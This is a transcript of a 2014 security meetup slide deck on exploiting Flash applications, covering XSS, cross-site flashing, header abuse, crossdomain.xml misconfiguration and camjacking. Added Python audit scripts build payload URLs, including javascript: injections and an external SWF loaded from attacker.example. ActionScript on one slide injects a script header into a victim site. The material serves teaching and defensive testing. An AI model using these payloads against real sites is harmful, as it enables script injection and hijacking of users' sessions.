Flashack – Exploiting Flash Applications
Abir Banerjee, n|u Bangalore – 14 June 2014

Uploaded by nu-the-open-security-community on 06-May-2015


DESCRIPTION

null Bangalore Chapter - June 2014 Meet

TRANSCRIPT

Page 1: Flashack

Flashack – Exploiting Flash Applications

Abir Banerjee, n|u Bangalore – 14 June 2014

Page 2: Flashack

References

• https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project

• https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004)

• http://blog.watchfire.com/FPI.pdf

• http://habrahabr.ru/post/182706/

• http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt

• http://events.ccc.de/camp/2007/Fahrplan/attachments/1320-FlashSec.pdf

• http://sethsec.blogspot.in/2014/03/exploiting-misconfigured-crossdomainxml.html

• http://gursevkalra.blogspot.in/2013/08/bypassing-same-origin-policy-with-flash.html

• http://www.andlabs.org/presentations/Test_Security_Flash.pdf

• http://www.securityfocus.com/archive/1/441014/30/0/threaded

Page 3: Flashack

Introduction to Flash

• Multimedia software platform that brought graphics, animation, games and many Rich Internet Applications (RIAs) to the Web; the content is viewed, played and executed by Adobe Flash Player

• Flex -> cousin of Flash: a framework built on the Flash runtime that uses ActionScript 3 (and MXML) to build complex, flexible business logic, especially for Rich Internet Applications

• Browsers require the Flash plugin to play Flash executable files (SWF) embedded in web pages

• Flash applications are programmed in an object-oriented language called ActionScript 2.0 / 3.0

Page 4: Flashack

Flash Myth? • Flash is outdated, dead, attacks don't work... etc. Is it true?

• It will exist as long as browsers support it!

• The majority of the attacks are due to programming flaws, not to the player itself

Page 5: Flashack

Flash Application Security Concerns

• JavaScript execution is possible from Flash

• Flash can be used to forge HTTP headers

• Exploiting cross-domain policy misconfiguration

• Flash + Clickjacking -> leveraged for Camjacking!

• It can load and execute external Flash movies

• Flash can be decompiled easily

Page 6: Flashack

Vulnerabilities in Flash

Client Side Vulnerabilities

• Cross-Site Scripting via Flash

• Potentially Dangerous Native Functions (PDNF)

• Cross-Site Flashing

• Abusing HTTP Headers & Cross Domain Policies

• Decompilation & Sensitive Data Storage

Server Side Vulnerabilities

• Action Message Format (AMF) tampering

• Remote Calls, Service Enumeration, Injection etc.

Page 7: Flashack

Decompiling Flash • SWF files are bytecode interpreted by a virtual machine embedded in the player itself (AVM1 for ActionScript 2.0, AVM2 for ActionScript 3.0), so the original code can be recovered from the file

Decompilers

• HP SwfScan

• Flare

• JPEXS Free Flash Decompiler

• Sothink SWF Decompiler

• Flash Decompiler Trillix

Impact

• A SWF can be easily decompiled and analysed for insecure programming, hard-coded credentials, keys and internal URLs

Mitigation

• Treat the SWF as public: never hard-code credentials or secrets, keep sensitive logic and checks on the server, sanitize user input

• Obfuscation only raises the effort needed to read the code; use it as a deterrent, not as protection
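Added example, not code from the slides: the first thing a tester does after downloading a SWF, before opening a full decompiler, is to unwrap the container and pull the string constants. The Python script below parses the FWS/CWS header, decompresses a zlib-compressed body and flags credential-looking strings and embedded URLs. The SWF it runs on is constructed inline (SAMPLE_BODY) and the hint patterns are the example's own choice; ZWS (LZMA) files are recognised but not decompressed here.

```python
import re
import struct
import zlib

# "Decompiler-lite": open the SWF container and pull out the string constants
# an attacker would read first. Handles the FWS (raw) and CWS (zlib) containers.
STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")          # printable ASCII runs of 6+ bytes
SECRET_HINT_RE = re.compile(r"(passw(or)?d|secret|api[_-]?key|token|https?://)", re.I)


def parse_swf(data: bytes) -> dict:
    """Split a SWF into its 8-byte header and (decompressed) body."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    signature = data[:3]
    if signature not in (b"FWS", b"CWS", b"ZWS"):
        raise ValueError(f"not a SWF, signature {signature!r}")
    version = data[3]
    declared_length = struct.unpack("<I", data[4:8])[0]   # uncompressed size incl. header
    if signature == b"FWS":
        body = data[8:]
    elif signature == b"CWS":
        body = zlib.decompress(data[8:])                   # zlib stream starts at byte 8
    else:
        raise ValueError("ZWS (LZMA-compressed) SWF: not handled by this example")
    return {
        "signature": signature.decode("ascii"),
        "version": version,
        "declared_length": declared_length,
        "body": body,
        "length_matches": declared_length == 8 + len(body),
    }


def extract_strings(body: bytes) -> list:
    """All printable strings in the SWF body. AS2 DoAction tags store strings
    null-terminated and AS3 ABC constant pools store them length-prefixed; a
    byte-level scan finds both without a real decompiler."""
    return [m.group().decode("ascii") for m in STRING_RE.finditer(body)]


def find_suspicious_strings(body: bytes) -> list:
    """Strings a reviewer would flag: credential-looking names and embedded URLs."""
    return [s for s in extract_strings(body) if SECRET_HINT_RE.search(s)]


# Constructed sample: a minimal body (frame-size RECT, frame rate, frame count)
# followed by the kind of constants a careless developer leaves in a SWF.
SAMPLE_BODY = (
    b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00"   # RECT: 0..1500 x 0..1000 twips
    + b"\x00\x18"                             # frame rate 24
    + b"\x01\x00"                             # frame count 1
    + b"\x00adminPassword=Hunter2!\x00"
    + b"\x00http://api.example.com/login?apikey=deadbeef\x00"
    + b"\x00hello\x00"                        # too short to be reported
)


def build_sample_swf(compressed: bool = True, version: int = 10) -> bytes:
    """Wrap SAMPLE_BODY in a CWS (zlib) or FWS (uncompressed) container."""
    header = (b"CWS" if compressed else b"FWS") + bytes([version])
    header += struct.pack("<I", 8 + len(SAMPLE_BODY))
    return header + (zlib.compress(SAMPLE_BODY) if compressed else SAMPLE_BODY)


if __name__ == "__main__":
    info = parse_swf(build_sample_swf())
    print(info["signature"], "v%d" % info["version"], "length ok:", info["length_matches"])
    for s in find_suspicious_strings(info["body"]):
        print("  suspicious:", s)
```

Run it against a real download by replacing build_sample_swf() with the file's bytes; anything it reports is worth opening in JPEXS to see which function uses it.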

Page 8: Flashack

Cross-Site Scripting (XSS)

• A Flash SWF can access the DOM of its host page, depending on the allowScriptAccess policy set in the embedding HTML

• A Flash SWF can modify the DOM of its host page (getURL("javascript:..."), ExternalInterface)

Impact

• XSS attack on the host DOM causing malicious script execution in the origin of the page that embeds the SWF

Mitigation

• Validate and sanitize user input (FlashVars, query string, loaded data) before it reaches any function that hands a URL or script to the browser

Page 9: Flashack

XSS Continued... _global and _root objects

• Attributes of the _global and _root objects are referenced as:

_root.variableName

_global.variableName

• FlashVars, injection into HTML text fields

• Unsafe methods

What is the Problem?

• If a variable is never initialised in the code, Flash Player initialises it from the query string (or FlashVars), so the attacker chooses its value

• Usage of insecure functions

• Unsanitized input

Exploitation

• Unsafe methods take a URL as their argument -> an attacker-controlled URL can be supplied from the query string

• HTML text injection: a value that lands in an HTML text field (htmlText) can carry a link using the asfunction: protocol

Typical payload –

http://victim.com/victim.swf?variableName=asfunction:getURL,javascript:evilcode

(javascript: URLs work directly in getURL(); the asfunction: form is for values that end up as a link target inside an HTML text field)

Page 10: Flashack

Cross-Site Flashing

• Cross-Site Flashing (XSF) occurs when one SWF or movie loads another SWF or movie from an origin the author did not intend

• It is performed by forcing a flawed SWF to load an external, attacker-controlled Flash file, typically through an uninitialised variable that ends up in loadMovie() / loadMovieNum()

• XSF can also be reached through Flash HTML injection (an <img> or link in htmlText pointing at an external SWF) wherever the loadMovie* methods are used

Impact

• This attack can lead to phishing (a fake UI rendered inside the trusted site's movie) or to loading further malicious files

Mitigation

• Initialise every variable and sanitize user input

• Use strict cross-domain policies

• If not required, don't allow an external SWF to be loaded into _level0 (it replaces the whole movie)

Page 11: Flashack

Potentially Dangerous Native Function (PDNF)

Vulnerable Functions in ActionScript 2.0

• getURL()

• loadMovie()

• loadMovieNum()

• LoadVars.load()

• LoadVars.send()

• FScrollPane.loadScrollContent()

• Sound.loadSound()

• NetStream.play()

• XML.load()

What’s the Problem?

• All of these functions take a URL as an input parameter; if that URL comes from an uninitialised variable, the attacker chooses it (javascript:, asfunction:, or an external SWF)

Mitigation

• Initialize Variables and Sanitize user input
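Added example, not code from the slides, tying the XSS, Cross-Site Flashing and PDNF slides together: a heuristic Python scan over decompiled ActionScript 2.0 text that reports every URL-taking sink fed by a variable the movie never initialises, and turns each finding into test URLs for the three payload shapes the slides describe. The sample script, the payload strings and the sink list (the method names from the PDNF slide) are the example's own; the regexes do not parse ActionScript, so treat the output as leads to confirm in a browser.

```python
import re
from urllib.parse import quote

# URL-taking sinks from the PDNF slide, matched by method name only, so
# LoadVars.load, XML.load and any other .load() all match "load".
SINK_RE = re.compile(
    r"\b(getURL|loadMovie|loadMovieNum|loadScrollContent|loadSound|play|load|send)\s*\(\s*([^,)]*)"
)
# Identifiers inside an argument expression, with a _root./_global./_level0. prefix dropped.
IDENT_RE = re.compile(r"\b(?:_root\.|_global\.|_level0\.)?([A-Za-z_]\w*)\b")
STRING_LITERAL_RE = re.compile(r'^\s*"[^"]*"\s*$')
NOT_VARIABLES = {"this", "undefined", "null", "true", "false", "new", "String", "escape"}


def strip_comment(line: str) -> str:
    """Drop a trailing // comment, but not the // inside a "http://..." literal."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif not in_string and line.startswith("//", i):
            return line[:i]
    return line


def assigned_names(script: str) -> set:
    """Names the script initialises itself: var x, x = ..., _root.x = ...
    (== is not an assignment). Heuristic: an = inside a string literal also counts."""
    names = set(re.findall(r"\bvar\s+([A-Za-z_]\w*)", script))
    names.update(re.findall(r"\b([A-Za-z_]\w*)\s*=(?!=)", script))
    return names


def find_uninitialised_sinks(script: str) -> list:
    """(sink, argument, attacker-controlled names) for every sink call whose
    argument uses a variable the script never assigns; Flash Player fills such
    variables from the query string / FlashVars."""
    initialised = assigned_names(script)
    findings = []
    for line in script.splitlines():
        code = strip_comment(line)
        for m in SINK_RE.finditer(code):
            sink, arg = m.group(1), m.group(2).strip()
            if not arg or STRING_LITERAL_RE.match(arg):
                continue                           # constant URL: not attacker-controlled
            tainted = sorted(
                n for n in set(IDENT_RE.findall(arg))
                if n not in initialised and n not in NOT_VARIABLES
            )
            if tainted:
                findings.append((sink, arg, tainted))
    return findings


# Payloads for the three outcomes the slides describe. javascript: fires when
# getURL()/loadMovie() hands the URL to the browser; asfunction: only fires when
# the value becomes a link target in an HTML text field; the .swf form turns the
# flawed movie into a loader for an attacker SWF (cross-site flashing).
PAYLOADS = (
    "javascript:alert(document.domain)",
    "asfunction:getURL,javascript:alert(document.domain)",
    "http://attacker.example/evil.swf",
)


def build_test_urls(swf_url: str, findings: list) -> list:
    """One test URL per (attacker-controlled variable, payload)."""
    names = sorted({n for _sink, _arg, tainted in findings for n in tainted})
    return [f"{swf_url}?{name}={quote(p, safe='')}" for name in names for p in PAYLOADS]


# Constructed sample: what a decompiler typically shows for a frame script.
SAMPLE_SCRIPT = '''
var base = "http://example.com/";
if (_root.skin == undefined) { _root.skin = "default.swf"; }   // initialised: safe
loadMovie(_root.skin, "holder");
getURL(_root.clickTAG, "_blank");          // clickTAG never assigned: injectable
loadMovieNum(base + _root.page, 0);        // page never assigned: cross-site flashing
getURL("http://example.com/help", "_blank");
xmlLoader.load(_root.config);              // config never assigned: attacker picks the XML source
'''

if __name__ == "__main__":
    found = find_uninitialised_sinks(SAMPLE_SCRIPT)
    for sink, arg, names in found:
        print(f"{sink}({arg}) <- uninitialised: {', '.join(names)}")
    for url in build_test_urls("http://victim.example/victim.swf", found):
        print(url)
```

The clickTAG case is the classic one: advertising SWFs read clickTAG from FlashVars and pass it straight to getURL(), which is exactly the pattern this scan reports.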

Page 12: Flashack

Abusing HTTP Headers • Flash can add arbitrary request headers to the requests it sends, which turns any server or proxy that reflects a header into an HTTP header injection / XSS vector

How to use it?

• The following ActionScript 2.0 sends a GET request to the victim site, say http://www.victim.com/page.php?p1=a&p2=b, with an arbitrary header (Expect: <script>alert(1)</script>)

For GET Request

    var req:LoadVars = new LoadVars();
    req.addRequestHeader("Expect", "<script>alert(1)</script>");
    req.send("http://www.victim.com/page.php?p1=a&p2=b", "_blank", "GET");

For POST Request

    var req:LoadVars = new LoadVars();
    req.addRequestHeader("Expect", "<script>alert(1)</script>");
    req.decode("a=b&c=d");
    req.send("http://www.victim.com/page.php?p1=a&p2=b", "_blank", "POST");

• The request is sent by the browser hosting the Flash object, so any cookies the browser normally sends go with it, as do the browser's User-Agent and all other standard headers. HTTPS URLs are supported.

• Caveat: the Expect trick depended on servers that reflected the header into an error page, and later Flash Player versions refuse to set a list of headers; for a cross-domain request the target's crossdomain.xml must additionally permit custom headers with allow-http-request-headers-from.

Page 13: Flashack

Cross Domain Access Policies

• crossdomain.xml - a policy file on your server that tells Flash Player which SWF files from other domains may read responses from your domain (it governs reading the response, not sending the request: plain cross-domain GET/POST requests go out regardless)

Sample crossdomain.xml file

    <?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd">
    <!-- Policy file for mysite.com -->
    <cross-domain-policy>
      <!-- This is a master-policy file -->
      <site-control permitted-cross-domain-policies="master-only"/>
      <allow-access-from domain="www.example.com" secure="true"/>
      <allow-access-from domain="*.example.com"/>
    </cross-domain-policy>

Page 14: Flashack

Cross Domain Access Policies

Good crossdomain.xml file

    <?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd">
    <!-- Policy file for mysite.com -->
    <cross-domain-policy>
      <!-- This is a master-policy file -->
      <site-control permitted-cross-domain-policies="master-only"/>
      <allow-access-from domain="www.example.com" secure="true"/>
      <allow-access-from domain="*.example.com"/>
    </cross-domain-policy>

Bad crossdomain.xml file

    <?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd">
    <!-- Policy file for mysite.com -->
    <cross-domain-policy>
      <!-- This is a master-policy file -->
      <site-control permitted-cross-domain-policies="all"/>
      <allow-access-from domain="*"/>
    </cross-domain-policy>

• permitted-cross-domain-policies accepts none, master-only, by-content-type, by-ftp-filename and all; "all" means any policy file anywhere on the host (for example one dropped into an upload directory) is honoured

Threat – If user A is logged in to www.abc.com and then visits www.def.com where a malicious SWF is loaded, that SWF can send requests to www.abc.com with A's cookies and read the authenticated responses, because the policy allows every domain

Mitigation – Never use "*"; list the exact domains that need access, keep secure="true" (the default) on HTTPS sites, and use master-only so no other policy file on the host can widen access
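Added example, not code from the slides: a Python checker that evaluates a crossdomain.xml for a given requesting origin the way Flash Player does, and audits it for the mistakes above. The two policy files are the slide's good and bad ones (the bad one uses the valid permissive value "all", with secure="false" and an allow-http-request-headers-from element added so the audit has something to find). The wildcard rule is the example's reading of Adobe's policy file specification (assumption: "*.example.com" also matches the bare "example.com"), and the issue wording is the example's own.

```python
import xml.etree.ElementTree as ET

VALID_SITE_CONTROL = {"none", "master-only", "by-content-type", "by-ftp-filename", "all"}


def parse_policy(xml_text: str) -> ET.Element:
    root = ET.fromstring(xml_text)          # expat does not fetch the external DTD
    if root.tag != "cross-domain-policy":
        raise ValueError(f"not a cross-domain policy: <{root.tag}>")
    return root


def domain_matches(pattern: str, host: str) -> bool:
    """allow-access-from domain matching: exact host, "*", or "*.suffix"
    (assumed here to also match the bare suffix)."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return pattern == host


def is_allowed(policy, origin_host: str, origin_https: bool, policy_https: bool = True) -> bool:
    """Would a SWF served from origin_host be allowed to read responses from the
    host that serves this policy? policy_https: the policy was fetched over HTTPS."""
    for rule in policy.findall("allow-access-from"):
        if not domain_matches(rule.get("domain", ""), origin_host):
            continue
        secure = rule.get("secure", "true").lower() != "false"     # default: true
        if policy_https and secure and not origin_https:
            continue        # an HTTPS policy refuses HTTP origins unless secure="false"
        return True
    return False


def audit_policy(policy, policy_https: bool = True) -> list:
    """Human-readable findings for the misconfigurations the slides warn about."""
    issues = []
    site_control = policy.find("site-control")
    if site_control is not None:
        permitted = site_control.get("permitted-cross-domain-policies", "").lower()
        if permitted == "all":
            issues.append('site-control "all": any policy file on the host (e.g. an uploaded file) is honoured')
        elif permitted not in VALID_SITE_CONTROL:
            issues.append(f"site-control has invalid value {permitted!r}")
    for rule in policy.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            issues.append('allow-access-from domain="*": any site can read authenticated responses')
        if policy_https and rule.get("secure", "true").lower() == "false":
            issues.append(f'secure="false" for {domain}: HTTP origins can read HTTPS content')
    for rule in policy.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*":
            issues.append('allow-http-request-headers-from domain="*": any site may send custom headers')
    return issues


# Constructed samples: the slide's good policy, and a bad one in the same shape.
GOOD_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" secure="true"/>
  <allow-access-from domain="*.example.com"/>
</cross-domain-policy>"""

BAD_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for label, text in (("good", GOOD_POLICY), ("bad", BAD_POLICY)):
        policy = parse_policy(text)
        print(label, "attacker.example allowed:", is_allowed(policy, "attacker.example", True))
        for issue in audit_policy(policy):
            print("  -", issue)
```

To test a live site, fetch https://target/crossdomain.xml (and any per-directory policy files if site-control permits them) and feed the text to parse_policy(); is_allowed() with your own host as origin_host tells you whether a SWF you host could read the target's authenticated responses.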

Page 15: Flashack

Cross Domain Access Policies

AllowScriptAccess

    <object id='MyMovie.swf' classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'
            codebase='http://download.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0'
            height='100%' width='100%'>
      <param name='allowScriptAccess' value='sameDomain'/>
      <param name='src' value='MyMovie.swf'/>
      <embed name='MyMovie.swf' pluginspage='/go/getflashplayer' src='MyMovie.swf'
             height='100%' width='100%' allowScriptAccess='sameDomain'/>
    </object>

• allowScriptAccess controls whether the SWF may call JavaScript in the hosting page (ExternalInterface, getURL("javascript:...")); the values are always, sameDomain (the default since Flash Player 8) and never

Mitigation

• Do NOT use allowScriptAccess='always' for SWFs you do not control; embed third-party or user-supplied SWFs with 'never'

Page 16: Flashack

Cross Domain Access Policies

LocalConnection

• Used for communication between SWF files running on the same machine, even in different browser windows or players

• One SWF can call methods of another SWF even if they come from different domains, once the receiving SWF permits it

• Access control is enforced with the LocalConnection.allowDomain() method

Mitigation

• Do NOT use LocalConnection.allowDomain("*"), as it allows SWF files from every domain to invoke the exposed methods; list the specific sender domains instead

Page 17: Flashack

Cross Domain Access Policies

Security.allowDomain()

• Normally a SWF loaded from www.a.com cannot access the variables, objects, properties and methods of a SWF loaded from www.b.com, but the SWF from www.b.com can call Security.allowDomain("www.a.com") to grant exactly that access (cross-scripting)

• The HTTP-to-HTTPS restriction can be lifted with System.security.allowInsecureDomain() - BAD IDEA!! An HTTP SWF, which any network attacker can replace in transit, then gets to script the HTTPS one

• System.security.allowDomain("*") - BAD IDEA!! Every SWF on the web can script yours
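Added example, not code from the slides, covering the AllowScriptAccess, LocalConnection and Security.allowDomain slides together: a Python audit of a page's <object>/<embed> markup that flags cross-origin SWFs embedded with allowScriptAccess=always (or an invalid value), plus a line scan of decompiled ActionScript for allowDomain("*") and allowInsecureDomain() calls. The sample markup extends the slide's own object/embed with two constructed embeds; the page URL, the sample script and the finding wording are the example's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class EmbedCollector(HTMLParser):
    """Collect each <object>/<embed> with its SWF URL and allowScriptAccess value.
    For <object>, the SWF comes from the data attribute or a src/movie <param>."""

    def __init__(self):
        super().__init__()
        self.embeds = []
        self._object = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._object = {"src": a.get("data", ""), "allowscriptaccess": ""}
        elif tag == "param" and self._object is not None:
            name = a.get("name", "").lower()
            if name in ("src", "movie"):
                self._object["src"] = a.get("value", "")
            elif name == "allowscriptaccess":
                self._object["allowscriptaccess"] = a.get("value", "")
        elif tag == "embed":
            self.embeds.append({"src": a.get("src", ""),
                                "allowscriptaccess": a.get("allowscriptaccess", "")})

    def handle_endtag(self, tag):
        if tag == "object" and self._object is not None:
            self.embeds.append(self._object)
            self._object = None


def audit_embeds(page_url: str, html: str) -> list:
    """(swf_url, problem) for every embed that lets a SWF script a page it should not."""
    parser = EmbedCollector()
    parser.feed(html)
    parser.close()
    page_host = urlsplit(page_url).netloc.lower()
    findings = []
    for e in parser.embeds:
        swf_url = urljoin(page_url, e["src"])
        cross_origin = urlsplit(swf_url).netloc.lower() != page_host
        mode = (e["allowscriptaccess"] or "sameDomain").lower()    # Flash Player 8+ default
        if mode == "always" and cross_origin:
            findings.append((swf_url, "allowScriptAccess=always on a cross-origin SWF: it can run JavaScript in this page"))
        elif mode not in ("always", "samedomain", "never"):
            findings.append((swf_url, f"invalid allowScriptAccess value {e['allowscriptaccess']!r}"))
    return findings


# Calls that widen who may script this SWF: allowDomain("*") on Security or on a
# LocalConnection, and any allowInsecureDomain(), which lets HTTP content into HTTPS.
RELAX_RE = re.compile(r"""\b(allowDomain|allowInsecureDomain)\s*\(\s*(?:"([^"]*)"|'([^']*)')?""")


def find_domain_relaxations(script: str) -> list:
    """(line number, function, argument, source line) for each dangerous call."""
    hits = []
    for lineno, line in enumerate(script.splitlines(), 1):
        for m in RELAX_RE.finditer(line):
            func = m.group(1)
            arg = m.group(2) if m.group(2) is not None else m.group(3)
            if func == "allowInsecureDomain" or arg == "*":
                hits.append((lineno, func, arg, line.strip()))
    return hits


# Constructed samples: the slide's sameDomain embed plus a third-party widget
# embedded with allowScriptAccess=always and a banner with an invalid value.
SAMPLE_HTML = """\
<object id='MyMovie.swf' classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' height='100%' width='100%'>
  <param name='allowScriptAccess' value='sameDomain'/>
  <param name='src' value='MyMovie.swf'/>
  <embed name='MyMovie.swf' src='MyMovie.swf' height='100%' width='100%' allowScriptAccess='sameDomain'/>
</object>
<embed src='http://cdn.third-party.example/widget.swf' allowScriptAccess='always' width='300' height='250'/>
<embed src='/banners/promo.swf' allowScriptAccess='*'/>
"""

SAMPLE_SCRIPT = """\
System.security.allowDomain("www.partner.example");   // specific host: acceptable
System.security.allowDomain("*");                     // any SWF may script this one
lc = new LocalConnection();
lc.allowDomain("*");                                  // any domain may call lc's methods
System.security.allowInsecureDomain("www.a.com");     // HTTP content into an HTTPS SWF
"""

if __name__ == "__main__":
    for swf, problem in audit_embeds("https://www.example.com/index.html", SAMPLE_HTML):
        print(f"{swf}: {problem}")
    for lineno, func, arg, src in find_domain_relaxations(SAMPLE_SCRIPT):
        print(f"line {lineno}: {func}({arg!r})  <- {src}")
```

Same-origin SWFs with allowScriptAccess=always are not reported, since a SWF from your own origin can already be scripted by your own pages; the risk the slides describe is a SWF from somewhere else getting that privilege.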

Page 18: Flashack

Camjacking

• Camjacking refers to hijacking the user's webcam (and microphone) by clickjacking the Flash Player privacy settings dialog: the dialog is loaded in a transparent frame over a decoy page, so the victim's clicks land on "Allow" without them knowing

Page 19: Flashack

Thank You

Questions or Feedback?